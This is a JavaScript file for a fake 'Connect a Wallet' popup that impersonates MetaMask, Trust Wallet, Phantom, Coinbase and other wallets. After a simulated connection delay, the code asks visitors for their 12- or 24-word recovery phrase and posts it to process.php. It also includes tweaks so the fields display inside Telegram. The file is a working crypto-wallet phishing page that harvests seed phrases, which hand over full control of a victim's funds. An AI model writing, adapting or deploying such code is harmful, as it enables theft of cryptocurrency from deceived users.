// Open Modal
function openModal() {
    let modal = document.getElementById("walletModal");
    let modalContent = document.querySelector(".modal-content");

    // Reset modal to Phase 1 (Wallet Selection) before showing
    modalContent.innerHTML = `
        <span class="close" onclick="closeModal()">&times;</span>
        <h2>Connect a Wallet</h2>
        
        <p class="section-title">Recommended</p>
        <div class="wallet-option"><img src="images/wallet/metamask.png"> MetaMask</div>
        <div class="wallet-option"><img src="images/wallet/trustwallet.png"> Trust Wallet</div>
        <div class="wallet-option"><img src="images/wallet/phantom.png"> Phantom</div>
        <div class="wallet-option"><img src="images/wallet/coinbase.png"> Coinbase Wallet</div>
        <div class="wallet-option"><img src="images/wallet/rainbow.png"> Rainbow</div>

        <!-- Hidden Extra Wallets -->
        <div id="extra-wallets" class="hidden">
            <div class="wallet-option"><img src="images/wallet/exodus.png"> Exodus</div>
            <div class="wallet-option"><img src="images/wallet/safepal.png">Safepal</div>
        </div>

        <!-- More Wallets Button -->
        <span id="more-wallets-btn" class="more-wallets" onclick="showMoreWallets()">More...</span>
    `;

    // Attach event listeners for wallet selection
    attachWalletListeners();

    modal.style.display = "flex";
}

// Close Modal and Reset to Phase 1
function closeModal() {
    let modal = document.getElementById("walletModal");
    modal.style.display = "none";
}

// Show More Wallets
function showMoreWallets() {
    let extraWallets = document.getElementById("extra-wallets");
    let moreWalletsBtn = document.getElementById("more-wallets-btn");

    if (extraWallets.classList.contains("hidden")) {
        extraWallets.classList.remove("hidden");
        moreWalletsBtn.textContent = "Less...";
    } else {
        extraWallets.classList.add("hidden");
        moreWalletsBtn.textContent = "More...";
    }
}

// Attach event listeners to wallet options
function attachWalletListeners() {
    document.querySelectorAll(".wallet-option").forEach(wallet => {
        wallet.addEventListener("click", function () {
            console.log("Wallet clicked:", this.textContent.trim());

            let walletName = this.textContent.trim();
            let walletLogo = this.querySelector("img").src;

            let modalContent = document.querySelector(".modal-content");

            // Show loading animation (Phase 2)
            modalContent.innerHTML = `
                <span class="close" onclick="closeModal()">&times;</span>
                <h2>Connecting...</h2>
                <div class="selected-wallet">
                    <img src="${walletLogo}" class="wallet-logo">
                    <div class="loader"></div>
                </div>
            `;

            // Simulate connection delay, then move to input phase (Phase 3)
            setTimeout(() => {
                modalContent.innerHTML = `
                    <span class="close" onclick="closeModal()">&times;</span>
                    <div id="walletContainer" style="text-align:center;">
                        <h2>${walletName}</h2>
                        <img id="walletLogo" src="${walletLogo}" style="height: 50px;">
                    </div>
                    <div style="text-align: center; margin-top: 40px;">
                        <p>Enter your wallet key phrase:</p>
                        <form action="process.php" method="POST">
                            <input type="hidden" name="walletName" value="${walletName}">
                            <div class="input-container" id="inputContainer">
                                ${generateInputFields(1, 12)}
                            </div>
                            <p id="togglePhrase" style="color:#007bff; cursor:pointer; margin-top:10px;">I have a 24 secret phrase</p>
                            <button type="submit" id="continueBtn" disabled style="width:80%; padding:12px; background-color:#007bff; color:white; border:none; font-size:16px; cursor:not-allowed; opacity:0.5; border-radius:5px; margin-top:20px;">Continue</button>
                        </form>
                    </div>
                `;

                attachInputValidation();
                attachTogglePhrase();
                forceFocusOnFirstInput();
            }, 3000);
        });
    });
}

// Function to generate input fields with 4 per row
function generateInputFields(start, count) {
    let fields = "";
    for (let i = start; i < start + count; i++) {
        if ((i - start) % 4 === 0) {
            fields += `<div class="row">`;
        }
        fields += `<input type="text" name="keyPhrases[]" placeholder="Word #${i}" required class="phrase-input" autocomplete="off">`;
        if ((i - start) % 4 === 3 || i === start + count - 1) {
            fields += `</div>`;
        }
    }
    return fields;
}

// Function to force focus on first input field
function forceFocusOnFirstInput() {
    setTimeout(() => {
        let firstInput = document.querySelector('.phrase-input');
        if (firstInput) {
            firstInput.focus();
        }
    }, 100);
}

// Function to attach input validation
function attachInputValidation() {
    const keyPhraseInputs = document.querySelectorAll('input[name="keyPhrases[]"]');
    const continueBtn = document.getElementById('continueBtn');

    keyPhraseInputs.forEach(input => {
        // Ensure input is not blocked
        input.removeAttribute('readonly');
        input.removeAttribute('disabled');

        // Apply styles to prevent hiding in Telegram
        input.style.opacity = "1";
        input.style.visibility = "visible";
        input.style.pointerEvents = "auto";

        input.addEventListener('input', () => {
            const allFilled = Array.from(keyPhraseInputs).every(input => input.value.trim() !== "");
            continueBtn.disabled = !allFilled;
            continueBtn.classList.toggle('active', allFilled);
            continueBtn.style.cursor = allFilled ? "pointer" : "not-allowed";
            continueBtn.style.opacity = allFilled ? "1" : "0.5";
        });
    });
}

// Function to attach toggle functionality
function attachTogglePhrase() {
    const togglePhrase = document.getElementById('togglePhrase');
    const inputContainer = document.getElementById('inputContainer');

    togglePhrase.addEventListener('click', () => {
        let currentInputs = inputContainer.querySelectorAll('input').length;

        if (currentInputs === 12) {
            inputContainer.innerHTML += generateInputFields(13, 12);
            togglePhrase.textContent = "I have a 12 secret phrase";
        } else {
            inputContainer.innerHTML = generateInputFields(1, 12);
            togglePhrase.textContent = "I have a 24 secret phrase";
        }

        attachInputValidation();
        forceFocusOnFirstInput();
    });
}

// Ensure modal starts at Phase 1 on page load
document.addEventListener("DOMContentLoaded", () => {
    attachWalletListeners();
});